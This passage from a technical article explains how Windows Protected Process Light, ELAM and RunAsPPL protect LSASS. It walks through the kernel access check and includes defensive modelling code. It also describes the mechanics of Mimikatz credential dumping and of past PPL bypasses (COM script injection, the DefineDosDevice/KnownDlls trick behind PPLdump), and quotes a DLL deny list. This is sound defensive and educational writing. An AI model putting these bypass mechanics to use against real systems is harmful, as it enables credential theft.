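  return new Set(resourceCertHashes.map((h) => h.toLowerCase()));
}

// Service start: admit at PPL/Antimalware only if the signer's hash was listed at boot.
function admitService(signerCertHash, cachedHashes) {
  return cachedHashes.has(signerCertHash.toLowerCase()) ? PPL_ANTIMALWARE : 0x00;
}

const cached = cacheElamResource(['AAAA1111', 'BBBB2222']); // hypothetical vendor hashes
console.log(admitService('aaaa1111', cached).toString(16)); // 31
console.log(admitService('CCCC3333', cached).toString(16)); // 0
```

The design point the model preserves: the allowlist is fixed when the driver is signed and read at boot, so nothing the attacker controls at runtime can add an entry.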

By 2024, every major commercial EDR ships through this path. Microsoft Defender's MsMpEng.exe uses the inbox WdBoot.sys ELAM driver. Third-party members of Microsoft's Virus Initiative -- the cohort gated by the MVI criteria quoted above [@learn-mvi] -- ship their own vendor ELAM drivers and run their main user-mode daemons at PPL/Antimalware.

WdBoot.sys ("Windows Defender Boot Driver") is Microsoft's inbox first-party ELAM driver; it ships in every Windows install and is loaded before any third-party ELAM driver. The canonical reference implementation of the ELAM resource-section pattern is Microsoft's Windows-driver-samples/security/elam repository [@ms-elam-sample], which also documents the Early Launch EKU 1.3.6.1.4.1.311.61.4.1 verbatim.

Microsoft Learn's "Early Launch Antimalware" page is the canonical confirmation [@learn-elam]:

Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger.

One Microsoft-signed sentence and a billion endpoints. EDR vendors get protection against administrator-level tampering for free, on top of the kernel telemetry their drivers already collect. Microsoft gets a viable third-party security market without widening the EKU gates beyond a controllable set of vendors.

ELAM admits the daemon. The next operational question is what Microsoft does for lsass.exe itself -- the canonical credential store, the original Mimikatz target. The mechanism is called RunAsPPL.

6. RunAsPPL -- Hardening LSASS

The registry value that produced the Mimikatz failure in Section 1 is a single DWORD. itm4n's walkthrough names it verbatim [@itm4n-runasppl]:

Open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot.

After reboot, lsass.exe launches at PPL/Lsa, signer rung 4, protection byte 0x41. Mimikatz running with full SYSTEM-integrity and SeDebugPrivilege then receives 0x00000005 on OpenProcess(PROCESS_VM_READ, lsass.exe). The registry knob is one DWORD; the consequences are large.
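The protection byte packs three fields into eight bits: the protection type in bits 0-2, the Audit bit in bit 3, and the signer in bits 4-7. A minimal sketch of that encoding follows. The enum names are illustrative renderings of the kernel's protected-type and protected-signer values, and the helper functions are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Protected-process type (bits 0-2 of the protection byte). */
enum ps_type { PS_TYPE_NONE = 0, PS_TYPE_PPL = 1, PS_TYPE_PP = 2 };

/* Signer rung (bits 4-7 of the protection byte). */
enum ps_signer {
    PS_SIGNER_NONE = 0, PS_SIGNER_AUTHENTICODE = 1, PS_SIGNER_CODEGEN = 2,
    PS_SIGNER_ANTIMALWARE = 3, PS_SIGNER_LSA = 4, PS_SIGNER_WINDOWS = 5,
    PS_SIGNER_WINTCB = 6, PS_SIGNER_WINSYSTEM = 7, PS_SIGNER_APP = 8
};

/* Pack type, audit bit and signer into one byte. */
static uint8_t protection_encode(unsigned type, unsigned signer, unsigned audit)
{
    assert(type <= 7 && signer <= 15 && audit <= 1);
    return (uint8_t)((signer << 4) | (audit << 3) | type);
}

/* Unpack the three fields again. */
static unsigned protection_type(uint8_t p)   { return p & 0x7u; }
static unsigned protection_audit(uint8_t p)  { return (p >> 3) & 0x1u; }
static unsigned protection_signer(uint8_t p) { return (p >> 4) & 0xFu; }
```

`protection_encode(PS_TYPE_PPL, PS_SIGNER_LSA, 0)` yields the `0x41` quoted above. Putting `PS_SIGNER_ANTIMALWARE` in the same position yields the `0x31` that PPL/Antimalware daemons run at.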

LSASS (Local Security Authority Subsystem Service): The Windows user-mode process that holds NTLM password hashes, Kerberos Ticket Granting Tickets, MSV1_0 credential caches, DPAPI master keys, and (on legacy builds before Microsoft's 2014 KB2871997 update [@ms-kb2871997]) WDigest plaintext passwords. The canonical target of credential-theft tooling since 2011.

The threat being mitigated is simple. Mimikatz reads LSASS memory via OpenProcess(PROCESS_VM_READ, lsass.exe), walks the internal key-store structures, and extracts NTLM hashes, Kerberos session keys, and (on older configurations) cached plaintext. Restricting SeDebugPrivilege does not work, because an attacker with SYSTEM has every privilege. Restricting the security descriptor on lsass.exe does not work either, because legitimate services need to interact with it. PPL is the right primitive: it gates the full mask irrespective of token state, and the kernel admits only Microsoft-signed code into the Lsa rung.

RunAsPPL = 1 is the stronger form of the setting on Secure Boot-capable machines. On the next boot, the kernel automatically mirrors the policy into a Secure Boot-anchored UEFI variable; once set, the protection survives registry rollback. An attacker who removes the registry key finds that LSASS still launches as PPL on the next boot. The only path to remove the protection is to disable Secure Boot at the firmware level, which requires physical access and which trips other defences. Microsoft Learn's documentation describes it verbatim [@learn-runasppl]:

You can achieve further protection when you use Unified Extensible Firmware Interface (UEFI) lock and Secure Boot. When these settings are enabled, disabling the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa registry key has no effect.

This is RunAsPPL = 1. For environments that need admin-removable protection without the UEFI lock, RunAsPPL = 2 (available on Win11 22H2 and later) omits the UEFI variable. The policy lives in the registry only and is removable by any administrator (or by malware running as administrator) who simply deletes the registry value before reboot.

`RunAsPPL` value	Behaviour	Removable by?	Persistence
`0` (or absent)	LSASS runs unprotected	n/a	none
`1`	LSASS runs as PPL/Lsa; policy mirrored to UEFI variable on Secure Boot machines	Physical access + Secure Boot disable	Firmware-anchored
`2`	LSASS runs as PPL/Lsa; registry only (Win11 22H2+ only)	Any admin who deletes the key	Registry only
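The table above can be read as a small decision function. The sketch below makes two choices that go beyond the table:

- Value `1` on a machine without Secure Boot is treated as registry-only persistence. This is an inference, because the table promises the UEFI mirror only on Secure Boot machines.
- Any value the table does not document returns an "unrecognized" state instead of a guess.

The enum and function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum lsa_persistence {
    LSA_UNPROTECTED,       /* value 0 or absent */
    LSA_REGISTRY_ONLY,     /* an administrator can remove it */
    LSA_FIRMWARE_ANCHORED, /* mirrored to a UEFI variable */
    LSA_UNRECOGNIZED       /* a value the table does not document */
};

/* Map the RunAsPPL DWORD (and Secure Boot state) to the table's
 * "Persistence" column. value_present == false models a missing value. */
static enum lsa_persistence runasppl_persistence(bool value_present, uint32_t value,
                                                  bool secure_boot)
{
    if (!value_present || value == 0)
        return LSA_UNPROTECTED;
    switch (value) {
    case 1:
        /* Assumption: with no Secure Boot there is no UEFI anchor. */
        return secure_boot ? LSA_FIRMWARE_ANCHORED : LSA_REGISTRY_ONLY;
    case 2:
        return LSA_REGISTRY_ONLY; /* Windows 11 22H2 and later */
    default:
        return LSA_UNRECOGNIZED;
    }
}
```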

Note: The RunAsPPL = 1 setting is the practical answer to "what stops an attacker who is willing to reboot?" Once the UEFI variable is set, neither registry rollback nor offline edits to the registry hive (for example, from a WinPE boot) can disable LSA protection on the next boot.

The deployment cost of RunAsPPL is compatibility with third-party authentication modules. LSASS hosts a set of plug-ins: smart-card middleware, third-party Cryptographic Service Providers (CSPs), password-filter DLLs, alternative authentication packages. Under RunAsPPL, the kernel demands that every DLL loaded into LSASS be Microsoft-signed at the LSA level (signer rung 4). Vendor DLLs that lack the right EKU are rejected at section creation. The rejections surface as events in the CodeIntegrity operational log (Applications and Services Logs > Microsoft > Windows > CodeIntegrity > Operational). Microsoft Learn enumerates the two relevant event IDs [@learn-runasppl]:

Event 3065 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the security requirements for shared sections.

Event 3066 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the Microsoft signing level requirements.

This is why Microsoft recommends running the setting in audit mode before enforcement. Audit mode is enabled by setting a separate AuditLevel DWORD to 8, but -- critically -- under a different registry key from the one that hosts RunAsPPL. Microsoft Learn places AuditLevel under the Image File Execution Options hive for LSASS.exe and names the path verbatim [@learn-runasppl]:

Open the Registry Editor, or enter RegEdit.exe in the Run dialog, and then go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe registry key. Open the AuditLevel value. Set its data type to dword and its data value to 00000008.

Note: RunAsPPL sits under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. AuditLevel = 8 sits under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe. A defender who assumes both values share one key and writes AuditLevel next to RunAsPPL creates a value that audit mode never consults. The deployment looks correct in the registry; the log surface is empty; the rollout breaks production on enforcement day. Two values. Two hives. Read this twice.
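Because this mistake is silent, it is worth catching before deployment. The sketch below is a hypothetical lint for the registry writes in a deployment script:

- It knows only the two value names and the two keys quoted in the note.
- It assumes keys are spelled with the `HKLM` abbreviation.
- It compares case-insensitively, because registry key and value names are case-insensitive.

It never touches a live registry.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

#define LSA_KEY "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"
#define IFEO_LSASS_KEY \
    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe"

enum lint_result { LINT_OK, LINT_WRONG_KEY, LINT_UNKNOWN_VALUE };

/* ASCII case-insensitive string equality. */
static int ieq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == *b; /* equal only if both strings ended together */
}

/* Check that a (key, value name) write targets the key that value belongs to. */
static enum lint_result lint_lsa_write(const char *key, const char *value_name)
{
    const char *expected = NULL;
    if (ieq(value_name, "RunAsPPL"))
        expected = LSA_KEY;
    else if (ieq(value_name, "AuditLevel"))
        expected = IFEO_LSASS_KEY;
    else
        return LINT_UNKNOWN_VALUE;
    return ieq(key, expected) ? LINT_OK : LINT_WRONG_KEY;
}
```

The case this lint exists for is `AuditLevel` written under the `Lsa` key. That write returns `LINT_WRONG_KEY`.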

In audit mode, the kernel emits the same 3065 / 3066 events for would-be load rejections but allows the loads to proceed. Two months of audit-mode telemetry typically surfaces every smart-card middleware DLL, every password-filter, every third-party CSP on a corporate fleet. Once the audit log is clean (every vendor's modules have been re-signed at the LSA level or replaced), enforcement mode can be turned on without breaking production logins.
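The audit-then-enforce decision reduces to a count over the CodeIntegrity log. In the sketch below, `struct ci_event` is a hypothetical, already-parsed record holding the event ID and the module that would have been rejected. Parsing the real event log is out of scope. Only events 3065 and 3066 count toward the decision, matching the two event IDs quoted above. The module names in any input are illustrative.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical parsed CodeIntegrity record. */
struct ci_event {
    unsigned id;        /* 3065 or 3066 for LSA-protection load failures */
    const char *module; /* DLL that would have been rejected */
};

struct audit_summary {
    size_t shared_section;   /* event 3065 */
    size_t signing_level;    /* event 3066 */
    size_t distinct_modules; /* unique DLLs behind those events */
};

static bool is_lsa_load_event(unsigned id) { return id == 3065 || id == 3066; }

static struct audit_summary summarize_audit(const struct ci_event *ev, size_t n)
{
    struct audit_summary s = {0, 0, 0};
    for (size_t i = 0; i < n; i++) {
        if (!is_lsa_load_event(ev[i].id))
            continue; /* other CodeIntegrity events are ignored here */
        if (ev[i].id == 3065)
            s.shared_section++;
        else
            s.signing_level++;
        /* Count a module only at its first relevant occurrence. */
        bool seen = false;
        for (size_t j = 0; j < i; j++) {
            if (is_lsa_load_event(ev[j].id) && strcmp(ev[j].module, ev[i].module) == 0) {
                seen = true;
                break;
            }
        }
        if (!seen)
            s.distinct_modules++;
    }
    return s;
}

/* Enforcement is safe only once audit mode logs no would-be rejections. */
static bool ready_for_enforcement(struct audit_summary s)
{
    return s.shared_section == 0 && s.signing_level == 0;
}
```

Running a fleet's audit-mode export through `summarize_audit` gives two answers. The first is the go/no-go decision for enforcement. The second is the number of distinct plug-in DLLs that still need re-signing or replacement.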

Note: Skipping audit mode is the most common cause of LSA protection rollouts being rolled back after a wave of authentication failures. See §11 Item 1 for the full audit-then-enforce-then-UEFI-lock recipe.

The deployment cadence has been deliberately glacial. RunAsPPL shipped in Windows 8.1 in October 2013 -- opt-in. It remained opt-in for nine years. Microsoft Learn records the inflection [@learn-runasppl]:

Audit mode for added LSA protection is enabled by default on devices running Windows 11 version 22H2 and later.

Audit mode default-on. Not enforcement. The Windows 11 24H2 release expanded the audit-mode rollout further. Eleven years from opt-in to effective default. The pace reflects the compatibility risk: every domain with a single non-Microsoft-signed LSASS plug-in would have surfaced as a support call.

The registry knob is simple. The kernel check that enforces it is not. The next section walks the access-check pipeline in detail, because the structural reason SeDebugPrivilege cannot help an attacker is the order in which the kernel asks its questions.

7. The Kernel Access Check -- What Happens Inside `NtOpenProcess`

Recall the trace from Section 1. The denial happens before SeAccessCheck runs. The reason SeDebugPrivilege does not help is not that the kernel decided to override the privilege; it is that the kernel never asked about the privilege. The order matters. Let us walk it.

The Win32 caller invokes OpenProcess, which passes through kernel32.dll (forwarded to kernelbase.dll on current builds) and ntdll.dll to the NtOpenProcess system call. NtOpenProcess locates the target process object and opens it through the object manager, which invokes the process object type's open callback, PspProcessOpen. Ionescu's Part 2 names the path verbatim [@ionescu-part2]:

Access to protected processes (and their threads) is gated by the PspProcessOpen and PspThreadOpen object manager callback routines, which perform two checks. The first, done by calling PspCheckForInvalidAccessByProtection (which in turn calls RtlTestProtectedAccess and RtlValidProtectionLevel) ...

PspCheckForInvalidAccessByProtection does two things. First, it splits the caller's requested access mask into two subsets:

The limited mask -- a fixed set of bits (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, and a small handful of others) that the lattice never forbids. The limited mask is subject only to the standard SeAccessCheck against the target's DACL.
The full mask -- everything else, including PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, and PROCESS_ALL_ACCESS. The full mask is subject to the lattice rule.

Limited access mask: The subset of `PROCESS_*` access rights that the PPL lattice always allows the standard `SeAccessCheck` to evaluate. It includes `SYNCHRONIZE`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SET_LIMITED_INFORMATION`, and `PROCESS_SUSPEND_RESUME`. `PROCESS_TERMINATE` is also included for targets at other signer rungs (deny mask `0xFC7FE`). For targets at the `Antimalware`, `Lsa`, and `WinTcb` rungs, the kernel widens the deny mask to `0xFC7FF`. The extra bit is bit 0, `PROCESS_TERMINATE`, so processes at those three rungs cannot be killed except by peers or higher.

Second, it indexes into RtlProtectedAccess[] using the caller's signer rung and the target's type, retrieves the row of permissible access bits, and ANDs the row with the full mask. If the result is non-empty, the access proceeds; if the result is zero, the kernel strips the full-mask bits from the request and returns either the limited subset (if the caller asked for any limited bits) or STATUS_ACCESS_DENIED. RtlValidProtectionLevel runs alongside as a sanity check on the encoded byte to catch malformed EPROCESS.Protection values that would otherwise let the lattice walk off the end of the table.
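The first of those two steps, the split, is a pair of bitwise operations against the deny mask. The sketch below uses the documented Win32 values of the `PROCESS_*` rights and the two deny masks quoted in the limited-mask definition. The function name `split_mask` is hypothetical, and the code models only the arithmetic, not the kernel routine.

```c
#include <assert.h>
#include <stdint.h>

/* Documented Win32 process access-right values. */
#define PROCESS_TERMINATE                 0x0001u
#define PROCESS_VM_READ                   0x0010u
#define PROCESS_SUSPEND_RESUME            0x0800u
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000u
#define PROCESS_SET_LIMITED_INFORMATION   0x2000u
#define SYNCHRONIZE                       0x00100000u
#define PROCESS_ALL_ACCESS                0x001FFFFFu

/* Deny masks from the limited-mask definition. */
#define PPL_DENY_DEFAULT 0x000FC7FEu
#define PPL_DENY_STRICT  0x000FC7FFu /* Antimalware, Lsa, WinTcb targets */

/* Split a requested mask into the bits the lattice never gates (limited)
 * and the bits it does gate (full). */
static void split_mask(uint32_t desired, uint32_t deny, uint32_t *limited, uint32_t *full)
{
    *full = desired & deny;
    *limited = desired & ~deny;
}
```

Splitting `PROCESS_ALL_ACCESS` against `0xFC7FE` leaves a limited half of `0x103801`. Those bits are `SYNCHRONIZE`, `PROCESS_SET_LIMITED_INFORMATION`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SUSPEND_RESUME`, and `PROCESS_TERMINATE`. The stricter `0xFC7FF` drops `PROCESS_TERMINATE` and leaves `0x103800`.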

Figure: the access-check pipeline inside NtOpenProcess.
Caller (any token) -> NtOpenProcess: NtOpenProcess(DesiredAccess).
NtOpenProcess -> PspProcessOpen: dispatch.
PspProcessOpen -> PspCheckForInvalidAccessByProtection: protection check.
PspCheckForInvalidAccessByProtection -> RtlTestProtectedAccess + RtlValidProtectionLevel: look up caller and target rungs.
RtlTestProtectedAccess -> RtlProtectedAccess[] table: index the row, retrieve the allowed bits.
RtlProtectedAccess[] table -> RtlTestProtectedAccess: row of allowed access bits.
RtlTestProtectedAccess -> PspCheckForInvalidAccessByProtection: full mask allowed or stripped.
PspCheckForInvalidAccessByProtection -> PspProcessOpen: residual mask (full or limited).
PspProcessOpen -> SeAccessCheck: residual mask vs DACL + token.
SeAccessCheck -> NtOpenProcess: final mask.
NtOpenProcess -> caller: handle or STATUS_ACCESS_DENIED.

Key idea: The protection check runs before SeAccessCheck. Privileges are evaluated by SeAccessCheck. The reason SeDebugPrivilege does not help is structural -- it is not consulted at the moment of denial.

Four worked traces make this concrete.

Case (a): admin -> lsass with PROCESS_ALL_ACCESS. The caller has no EPROCESS.Protection.Type (it is None). The target is PPL/Lsa. The lattice forbids the full mask. The kernel strips every bit of PROCESS_ALL_ACCESS except the limited subset. The caller wanted to read (and potentially write) process memory; the limited subset can do neither; the operation effectively fails. This is the Mimikatz scenario.

Case (b): admin -> lsass with PROCESS_QUERY_LIMITED_INFORMATION. Same caller, same target, but the requested mask sits entirely in the limited subset. The lattice does not gate the limited mask. SeAccessCheck evaluates the DACL on lsass.exe, finds that administrators are permitted to query basic process information, and the call succeeds. This is why Process Explorer can still enumerate lsass.exe and show its threads even when LSA protection is enabled.

Case (c): MsMpEng.exe (PPL/Antimalware, rung 3) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 3 < target rung 4, so the full mask is denied. Defender cannot read LSASS memory. Defender does not need to; the cross-rung isolation prevents one Microsoft service from reading another Microsoft service's secrets even within the same trusted system.

Case (d): hypothetical PPL/WinTcb (rung 6) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 6 >= target rung 4, so the full mask is allowed. A process signed at the WinTcb rung can read LSASS memory by design. This is how Service Control Manager and Windows Error Reporting can still interact with protected lsass.exe.

Caller	Target	Mask	Lattice rule	Outcome
Admin, no Protection	PPL/Lsa	PROCESS_ALL_ACCESS	Caller has no rung	Full mask stripped (denied)
Admin, no Protection	PPL/Lsa	PROCESS_QUERY_LIMITED_INFORMATION	Limited mask	Allowed (DACL permitting)
PPL/Antimalware (3)	PPL/Lsa (4)	PROCESS_VM_READ	3 < 4	Denied
PPL/WinTcb (6)	PPL/Lsa (4)	PROCESS_VM_READ	6 >= 4	Allowed
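The four traces in the table can be checked mechanically. The sketch below encodes this section's simplified rule:

- A caller dominates a target when both its protection type and its signer rung are at least the target's.
- A non-dominating caller keeps only the bits outside the target's deny mask.

The `>=` comparison is an assumption. It stands in for the per-signer dominate masks the kernel actually reads from `RtlProtectedAccess[]`. The sketch returns the residual mask handed to `SeAccessCheck`. It does not try to reproduce which `NTSTATUS` the kernel returns for mixed requests. All names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PROCESS_VM_READ                   0x0010u
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000u
#define PROCESS_ALL_ACCESS                0x001FFFFFu

enum { TYPE_NONE = 0, TYPE_PPL = 1, TYPE_PP = 2 };
enum { SIGNER_NONE = 0, SIGNER_ANTIMALWARE = 3, SIGNER_LSA = 4, SIGNER_WINTCB = 6 };

struct protection { unsigned type, signer; };

/* The deny mask depends on the target's signer: PROCESS_TERMINATE (bit 0)
 * is also denied at the Antimalware, Lsa and WinTcb rungs. */
static uint32_t deny_mask_for(struct protection target)
{
    switch (target.signer) {
    case SIGNER_ANTIMALWARE:
    case SIGNER_LSA:
    case SIGNER_WINTCB:
        return 0x000FC7FFu;
    default:
        return 0x000FC7FEu;
    }
}

/* Simplified rung rule (assumption): type and signer both at least the target's. */
static bool dominates(struct protection caller, struct protection target)
{
    return caller.type >= target.type && caller.signer >= target.signer;
}

/* Residual mask passed on to SeAccessCheck after the protection check. */
static uint32_t protection_filter(struct protection caller, struct protection target,
                                  uint32_t desired)
{
    if (target.type == TYPE_NONE || dominates(caller, target))
        return desired;                      /* lattice does not gate */
    return desired & ~deny_mask_for(target); /* full-mask bits stripped */
}
```

Under this model, case (a) keeps no `PROCESS_VM_READ` and case (b) keeps `PROCESS_QUERY_LIMITED_INFORMATION`. Case (c) ends with an empty mask, and case (d) passes `PROCESS_VM_READ` through, matching the four rows of the table.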

The Audit bit revisits the table from a different angle. itm4n's public structure definition annotates the bit as Reserved, and Ionescu Part 1 names it without semantic gloss. None of the public sources enumerates what, if anything, the kernel emits when the Audit bit is set and an OpenProcess call is denied. The sources checked are Ionescu Part 1, Forshaw 2018, itm4n's RunAsPPL writeup, and Microsoft Learn's RunAsPPL page. The CodeIntegrity events 3033/3063/3065/3066 on the Microsoft Learn page are scoped to AuditLevel under IFEO\LSASS.exe and to DLL-load failures, not to per-process Audit-bit denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field name and bit position imply a forensic side-channel; the exact event shape is not in the public record.

Two adjacent kernel mechanisms exist in the same neighbourhood but mediate different threat models. SYSTEM_PROCESS_TRUST_LABEL_ACE (a Trust SID ACL entry, introduced in Windows 8.1 alongside PPL) is an ACL-side companion that runs inside SeAccessCheck -- it adds a token-style trust label that interacts with the security descriptor in the standard way. Code Integrity Guard (ProcessSignaturePolicy) is a per-process signed-image enforcer settable at CreateProcess time via the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute. Neither is part of PPL; both interact with the same problem space.

The kernel verifies who is asking, what they are asking for, and at what rung the target sits. What the kernel cannot verify is the behaviour of code that arrives through a signed channel and then executes against attacker-controlled data. That structural seam is the entire premise of the bypass arms race, and it is the next section.

8. The Bypass Arms Race -- Forshaw, itm4n, Landau

If the kernel only verifies the channel by which code enters a PPL, every bypass should attack the seam between channel and behaviour. Test that prediction against the public record. Since 2018, four named bypasses have been published on major security-research blogs. All four sit in the same structural class.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every public PPL bypass since 2018 attacks the seam between what the channel proves (a signature, an EKU, a section identity) and what the code does once mapped.

Act I (2018) -- Forshaw and JScript-into-PPL

James Forshaw, then at Google Project Zero, published "Injecting Code into Windows Protected Processes Using COM" in October 2018 [@forshaw-2018-10]. The mechanism: a PPL can be made to instantiate a COM object whose CLSID resolves to scrobj.dll, the Microsoft-signed Windows Script Component scripting host. Once loaded into the PPL, the script object accepts attacker-supplied source code and executes it inside the protected process. The DLL is signed. The kernel admits it. The kernel cannot reason about the JScript source it then runs.

Microsoft's fix in Windows 10 1803 (April 2018, deployed broadly through that year) was a hardcoded deny-list in CI.DLL. Forshaw's own writeup gives the source verbatim [@forshaw-2018-10]:

UNICODE_STRING g_BlockedDllsForPPL[] = {
    DECLARE_USTR("scrobj.dll"),
    DECLARE_USTR("scrrun.dll"),
    DECLARE_USTR("jscript.dll"),
    DECLARE_USTR("jscript9.dll"),
    DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(
    PEPROCESS Process, LPBYTE Image, SIZE_T ImageSize)
{
    if (!PsIsProtectedProcess(Process)) return STATUS_SUCCESS;
    // walk g_BlockedDllsForPPL; if any match, return STATUS_DYNAMIC_CODE_BLOCKED
    ...
}

Five DLLs, hardcoded. Microsoft Learn corroborates the policy on the user-facing side [@learn-am-services]:

The following scripting DLLs are forbidden by CodeIntegrity inside a protected process: scrobj.dll, scrrun.dll, jscript.dll, jscript9.dll, and vbscript.dll.

Channel: a Microsoft-signed DLL. Behaviour: arbitrary attacker script. The fix narrows the channel by name-listing the five DLLs known to admit attacker behaviour. The class survives.

The mechanism was previewed at Recon Montreal 2018 in the joint Forshaw-Ionescu talk "Unknown Known DLLs and other Code Integrity Trust Violations" (June 15-17, 2018) [@recon-mtl-2018]. Forshaw's August 2017 "Bypassing VirtualBox Process Hardening" essay [@forshaw-2017-vbox] is the structural precursor -- it makes the same channel-vs-behaviour argument against a different kernel-supported process-hardening regime.
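Forshaw's excerpt elides the comparison loop, so the sketch below fills it in with an assumption. It matches the image's file name case-insensitively against the five listed names, behind the same protected-process early-out. It is a user-mode model of the policy, not CI.DLL's code, and `ppl_image_blocked` is a hypothetical name.

```c
#include <assert.h>
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* The five names from the g_BlockedDllsForPPL excerpt. */
static const char *const blocked_dlls_for_ppl[] = {
    "scrobj.dll", "scrrun.dll", "jscript.dll", "jscript9.dll", "vbscript.dll"
};

/* ASCII case-insensitive equality. */
static bool ascii_ieq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
        a++;
        b++;
    }
    return *a == *b;
}

/* File-name component of a path using '\' or '/' separators. */
static const char *base_name(const char *path)
{
    const char *back = strrchr(path, '\\');
    const char *fwd = strrchr(path, '/');
    const char *sep = (fwd && (!back || fwd > back)) ? fwd : back;
    return sep ? sep + 1 : path;
}

/* True when loading this image into the target should be refused. */
static bool ppl_image_blocked(bool target_is_protected, const char *image_path)
{
    if (!target_is_protected)
        return false; /* mirrors the PsIsProtectedProcess early-out */
    const char *name = base_name(image_path);
    for (size_t i = 0; i < sizeof blocked_dlls_for_ppl / sizeof blocked_dlls_for_ppl[0]; i++) {
        if (ascii_ieq(name, blocked_dlls_for_ppl[i]))
            return true;
    }
    return false;
}
```

The model makes the design choice visible. The check keys on names, so it blocks exactly the five interpreters it lists. It says nothing about any other signed DLL that interprets attacker input.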

Act II (2018-2021) -- DefineDosDevice and PPLdump

In his August 2018 post on object-directory exploits [@forshaw-2018-08], Forshaw added a single throwaway sentence that the security community would spend three years productising. itm4n quotes it verbatim in his 2021 SCRT walkthrough [@itm4n-scrt]:

Abusing the DefineDosDevice API actually has a second use, it's an Administrator to Protected Process Light (PPL) bypass.

The mechanism, fully worked out by itm4n in April 2021, is structural and uses that same primitive. As an administrator, call DefineDosDevice to create a symbolic link in \KnownDlls\ (the object-manager directory that the loader uses for fast known-DLL lookups). The call is dispatched via RPC to csrss.exe, which runs at PPL/WinTcb (rung 6) and so has the lattice authority to write into protected directories. The administrator gets a \KnownDlls\ entry pointing at an attacker-controlled section. Now start a PPL. The PPL's loader resolves DLL names through \KnownDlls\ and finds the administrator's entry. The PPL maps the attacker's section without re-validating its on-disk signature, because \KnownDlls\ is the kernel's vouched-for fast path.

itm4n's PPLdump tool, published April 2021, automated the attack. The README test matrix lists every Windows version it ran against [@ppldump-repo]. For fifteen months, an administrator could dump any PPL's memory, including lsass.exe, despite RunAsPPL.

Microsoft's fix arrived in build 19044.1826 (the July 2022 update to Windows 10 21H2). itm4n's "End of PPLdump" writeup analyses the patch with BinDiff and concludes [@itm4n-end-of-ppldump]:

The conclusion is that PPLs now appear to be behaving just like PPs and therefore no longer rely on Known DLLs.

The fix patched LdrpInitializeProcess in NTDLL to skip \KnownDlls\ for PPL processes, behind a Velocity feature flag (Feature_Servicing_2206c_38427506__private_IsEnabled). PPLdump's repository README now opens with [@ppldump-repo]:

2022-07-24 - As of Windows 10 21H2 10.0.19044.1826 (July 2022 update), the exploit implemented in PPLdump no longer works. A patch in NTDLL now prevents PPLs from loading Known DLLs.

itm4n's structural finding -- that *PPLs honoured \KnownDlls\ while PPs did not* -- is the most interesting failure in the eight-year run, because the asymmetry sat in plain sight from 2013 to 2022 and nobody had asked "why are PPs and PPLs loading sections differently?" The fix closes one asymmetry. The structural class survives.

PPLdump's substitution chain uses NTFS transactions and Forrest Orr's "phantom DLL hollowing" technique to materialise the attacker-controlled section on disk in a way the kernel section creator will accept [@forrest-orr-hollow]. Orr's writeup is the original publication of the hollowing primitive; PPLdump composes it with the \KnownDlls\ redirection trick.
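The PP/PPL asymmetry itm4n found, and the July 2022 change that removed it, can be written as a small resolution rule. The sketch below is a hypothetical model, not NTDLL's loader:

- `patched_2022` stands for the behaviour change in build 19044.1826.
- "Via file section" means the DLL is mapped from its own file rather than from a prebuilt `\KnownDlls\` section. For protected processes, that path goes through the section-create signature check.

```c
#include <assert.h>
#include <stdbool.h>

enum proc_kind { PROC_UNPROTECTED, PROC_PPL, PROC_PP };
enum dll_source { VIA_KNOWNDLLS, VIA_FILE_SECTION };

/* Hypothetical model of where the loader takes a DLL's section from. */
static enum dll_source resolve_dll(enum proc_kind kind, bool in_knowndlls, bool patched_2022)
{
    if (!in_knowndlls)
        return VIA_FILE_SECTION;
    if (kind == PROC_PP)
        return VIA_FILE_SECTION; /* PPs never relied on \KnownDlls\ */
    if (kind == PROC_PPL && patched_2022)
        return VIA_FILE_SECTION; /* after the fix, PPLs behave like PPs */
    return VIA_KNOWNDLLS;        /* pre-fix PPLs, and unprotected processes */
}
```

Before the fix, the rule gives PPLs the same answer as unprotected processes, which is the seam PPLdump used. After the fix, it gives them the PP answer.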

Act III (2022-2024) -- Landau's PPLFault CI TOCTOU

Gabriel Landau, then at Elastic, presented "PPLdump Is Dead. Long Live PPLdump!" at Black Hat Asia 2023 [@bh-asia-2023-pdf]. The mechanism is a Time-Of-Check / Time-Of-Use bug at the section-creation layer.

